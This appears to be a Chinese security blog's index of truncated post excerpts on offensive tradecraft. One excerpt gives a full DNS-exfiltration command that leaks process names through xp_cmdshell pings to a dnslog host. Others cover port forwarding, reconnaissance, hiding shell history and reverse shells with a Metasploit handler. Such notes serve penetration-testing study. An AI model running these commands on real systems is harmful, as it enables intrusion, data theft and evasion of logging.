利用dnslog探测目标进程

2021年12月30日  No comment

常用于mssql高权限注入目标主机不岀网利用cmdshell for循环实现for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.xxxx.dnslog.cn >nul用powershell&nb
阅读全文 »

端口转发python脚本

2021年12月23日  No comment

lts.py -listen 80 2222lts.py -slave 10.10.10.10:80 10.10.10.10:3389#!/usr/bin/env python     # coding=utf-8     '''     ===============
阅读全文 »

Linux主机信息收集

2021年12月22日  No comment

last   多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像 Ifconfig -a/arp -a/netstat -anopt/ss -nt ifconfig -a 查看内网ip 网卡 网关    route -n   内网路由情况,也能为内网网络拓扑提供一定的信息 IPtabl
阅读全文 »

Windows域信息收集提权命令

2021年12月20日  No comment

获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent C:\Users\Administrator\Recent   //默认位置 dir %APPDATA%\Microsoft\Windows\Recent dir 
阅读全文 »

Linux提权后总结

2021年08月10日  No comment

发行类型 版本在命令前加空格 命令不会被记录 [空格]set +o history   设置命令不被记录 set -o history       恢复记录命令 history -d [num]      删除指定命令行 num指左边序号标示 echo
阅读全文 »

Windows提权辅助工具Windows-Exploit-Suggester

2019年08月14日  No comment

安装               python 3.3.3安装xlrd库 https://pypi.org/project/xlrd/https://www.python.org/ftp/python/3.3.3/python-3.3.3.amd64.msihttps://www.python.org/ftp/python/3.3.3/python-3.3.
阅读全文 »

powershell反弹shell 的几种方法

2019年07月20日  No comment

    如果想接收多个sessions的话,用msf执行以下命令进行监听    反弹成功以后,用sessions id 来选择要操作的目标    NC反弹msfconsole use exploit/multi/hanler set payload windows/shell/reverse_tcp set lhost 1
阅读全文 »